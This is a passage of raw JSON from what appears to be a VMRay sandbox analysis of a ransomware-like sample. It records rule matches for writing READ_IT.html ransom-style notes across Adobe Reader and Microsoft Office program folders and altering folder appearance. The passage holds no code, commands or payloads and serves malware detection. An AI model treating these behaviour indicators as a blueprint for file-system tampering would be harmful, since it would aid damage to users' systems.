[], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16442", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16452", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16462", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16472", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16482", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16492", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16502", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16512", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16522", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16532", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16542", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16552", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16562", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16572", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16582", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16689", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\desktop.ini", "hashes": [], "norm_filename": "c:\\program files\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_16792", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\program files\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16797", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16839", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16845", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16861", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\templates\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\stationery\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17171", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\stationery\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Notebook Templates\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\notebook templates\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17193", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\notebook templates\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\fax\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17199", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\templates\\1033\\fax\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\access\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17221", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\templates\\1033\\access\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17271", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17281", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\templates\\1033\\access\\part\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17343", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Stationery\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\stationery\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17381", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\stationery\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17470", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\MYSL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\mysl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17863", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\mysl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OCRHC.DAT", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\ocrhc.dat", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_17883", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\ocrhc.dat\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OCRVC.DAT", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\ocrvc.dat", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File 